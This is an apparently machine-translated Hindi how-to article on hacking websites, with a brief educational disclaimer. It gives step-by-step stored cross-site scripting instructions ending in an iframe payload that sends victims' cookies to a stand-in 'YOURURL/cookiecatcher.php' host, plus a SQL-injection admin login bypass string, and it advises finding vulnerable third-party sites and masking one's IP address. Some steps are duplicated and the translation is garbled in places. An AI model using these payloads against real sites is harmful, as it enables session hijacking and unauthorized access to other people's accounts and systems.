IhsAdke.com

कैसे एक वेबसाइट हैक करने के लिए

ध्यान दें: इस गाइड का उद्देश्य केवल शैक्षिक उद्देश्यों के लिए उपयोग किया जाना है, चाहे लोगों को "व्हाईटहाट हैक्स" सीखना शुरू करने में मदद करना चाहिए या यह देखने के लिए कि वे अपनी साइट की बेहतर सुरक्षा के लिए हैकर्स कैसे काम करते हैं। यह ट्यूटोरियल आपको निम्न सुरक्षा स्तरों तक पहुंचने के लिए कदम उठाएगा।

चरणों

विधि 1
"क्रॉस साइट स्क्रिप्टिंग" का उपयोग करना

  1. 1
    एक कमजोर साइट खोजें जहां आप सामग्री पोस्ट कर सकते हैं। एक मंच एक अच्छा उदाहरण है याद रखें, यदि आपकी साइट सुरक्षित है, तो यह विधि काम नहीं करेगी
  2. 2
    एक पोस्ट बनाएं आपको "पोस्ट" के लिए एक विशेष कोड दर्ज करना होगा जो उस पर क्लिक करने वाले सभी के डेटा को कैप्चर करेगा।
    • आप यह देखना चाहते हैं कि क्या सिस्टम आपको कोड प्रकाशित करने की अनुमति देता है या यदि आप उन्हें फ़िल्टर करते हैं। इसमें टाइप करें चेतावनी ("परीक्षण") ("..." को निकालकर) यदि आपके पोस्ट पर क्लिक करते समय एक चेतावनी बॉक्स दिखाई देता है, तो साइट हमला करने के लिए कमजोर है
  3. 3
    एक कमजोर साइट खोजें जहां आप सामग्री पोस्ट कर सकते हैं। एक मंच एक अच्छा उदाहरण है याद रखें, यदि आपकी साइट सुरक्षित है, तो यह विधि काम नहीं करेगी
  4. 4
    एक पोस्ट बनाएं आपको "पोस्ट" के लिए एक विशेष कोड दर्ज करना होगा जो उस पर क्लिक करने वाले सभी के डेटा को कैप्चर करेगा।
    • आप यह देखना चाहते हैं कि क्या सिस्टम आपको कोड प्रकाशित करने की अनुमति देता है या यदि आप उन्हें फ़िल्टर करते हैं। इसमें टाइप करें चेतावनी ("परीक्षण") ("..." को निकालकर) यदि आपके पोस्ट पर क्लिक करते समय एक चेतावनी बॉक्स दिखाई देता है, तो साइट हमला करने के लिए कमजोर है
  5. 5
    बनाएँ और अपना कुकी पकड़ने वाला भेजें इस हमले का उद्देश्य किसी उपयोगकर्ता की कुकीज को कैप्चर करना है, जो आपको इस साइट पर प्रवेश भेद्यता के साथ अपने खाते का उपयोग करने की अनुमति देता है। आपको "कुकी पकड़ने वाला" की आवश्यकता होगी जो आपके लक्ष्य की कुकीज़ को कैप्चर करेगा और उसे रीडायरेक्ट करेगा। उस साइट पर कुकी पकड़ने वाला अपलोड करें जो कि PHP के लिए एक्सेस और समर्थन है। इंटरनेट पर कुकी पकड़ने के उदाहरण खोजें
  6. 6
    अपनी "कुकी पकड़ने वाला" स्क्रिप्ट के साथ एक पोस्ट बनाएं एक उपयुक्त कोड दर्ज करें जो कुकीज़ को कैप्चर करेगा और उन्हें आपकी साइट पर भेज देगा। कोड के बाद अपनी पोस्ट को छिपाने के लिए और उसे हटाए जाने से रोकने के लिए आपको कुछ पाठ रखना चाहिए।
    • एक उदाहरण कोड ऐसा दिखेगा <...iframe... frameborder= 0 height=0 width=0 src=jаvascript...:void(document.location=”YOURURL/cookiecatcher.php?c=”+document.cookie)><.../iframe>("..." को हटाकर)
  7. 7
    एकत्र किए गए कुकीज़ का उपयोग करें इसके बाद, आप कुकी की जानकारी का उपयोग कर सकते हैं, जिसे आपकी साइट पर संग्रहीत किया जाना आवश्यक है, किसी भी उद्देश्य के लिए जिसे आप की आवश्यकता होती है।

विधि 2
"इंजेक्शन आक्रमण" करना

  1. 1
    एक कमजोर साइट खोजें आपको एक कमजोर साइट मिलनी होगी जिस पर व्यवस्थापक लॉगिन है जो आसानी से सुलभ है। "Admin login.asp" के लिए Google पर खोजें
  2. 2



    एक व्यवस्थापक के रूप में प्रवेश करें उपयोगकर्ता नाम के रूप में व्यवस्थापक दर्ज करें और पासवर्ड के रूप में जाना जाता कुछ कोड का उपयोग करें सबसे आम हैं 1 `या` 1 `=` 1
  3. 3
    धैर्य। इस विधि को थोड़ा परीक्षण और त्रुटि की आवश्यकता है।
  4. 4
    साइट पर पहुंचें आखिरकार, आप उस अनुक्रम को पायेंगे जो प्रशासक को साइट पर पहुंच की अनुमति देता है (यदि यह साइट हमला करने के लिए असुरक्षित है)।

विधि 3
सफलता के लिए तैयारी

  1. 1
    एक या दो प्रोग्रामिंग भाषाएं जानें यदि आप वास्तव में साइट्स हैक करने के तरीके सीखना चाहते हैं, तो आपको यह समझने की आवश्यकता है कि कंप्यूटर और अन्य तकनीकों का काम कैसे हो। प्रोग्रामिंग भाषाओं जैसे कि पायथन या एसक्यूएल का उपयोग करना सीखें, ताकि आप कंप्यूटर पर बेहतर नियंत्रण कर सकें और सिस्टम में कमजोरियों की पहचान कर सकें।
  2. 2
    एचटीएमएल प्रोग्रामिंग जानिए वेबसाइटों को हैक करने के लिए आपको HTML और जावास्क्रिप्ट का अच्छा ज्ञान भी होना चाहिए। यह जानने के लिए कुछ समय लगता है, लेकिन इंटरनेट पर मुफ्त में HTML सीखने के कई तरीके हैं
  3. 3
    Whitehats के लिए देखो "व्हाईटहैट" हैक्स अच्छे के लिए उपयोग किए जाते हैं, सुरक्षा कमजोरियों को उजागर करते हैं और इंटरनेट को हर किसी के लिए एक बेहतर स्थान बनाते हैं यदि आप सीखना चाहते हैं कि कैसे हैक करना है, उस ज्ञान का उपयोग करें और अपने ज्ञान का उपयोग करें या यदि आप अपनी वेबसाइट की रक्षा करना चाहते हैं, तो आप सलाह के लिए हैकर व्हाइटहेट से संपर्क करना चाह सकते हैं।
  4. 4
    तीव्रता से खोजें यदि आप सीख रहे हैं कि कैसे हैक या कैसे खुद को बचाए, तो आपको बहुत अधिक शोध करने की आवश्यकता होगी। कई भिन्न प्रकार के भेद्यताएं हैं और यह सूची हमेशा बदलती रहती है, इसलिए आपको हमेशा सीखना जारी रखना होगा।
  5. 5
    वर्तमान रहें संभव हैक्स की सूची लगातार बदलती रहती है, आपको लगातार अपडेट रखने की जरूरत है। सिर्फ इसलिए कि आप किसी विशेष हैक के लिए सुरक्षित हैं इसका मतलब यह नहीं है कि आप भविष्य में सुरक्षित रहेंगे!

युक्तियाँ

  • उपयोगी टिप्स के बहुत सारे सीखने के लिए हैकर फ़ोरम पर जाएं।

चेतावनी

  • हैकिंग अवैध है यदि आप पकड़े गए हैं, तो यह आपकी गलती है
  • यदि आप वास्तविक दुनिया में हैक करने की कोशिश कर रहे हैं, तो ऑनलाइन उपलब्ध सॉफ़्टवेयर का उपयोग करके अपने आईपी पते को फेर लेना।
  • यदि आप इस लेख को पढ़ते हैं, तो आप तुरंत हैकर नहीं बनते हैं आप अपने कौशल का पता लगाने और एक बहुत अभ्यास करना चाहिए।
सामाजिक नेटवर्क पर साझा करें:

संबद्ध
© 2021 IhsAdke.com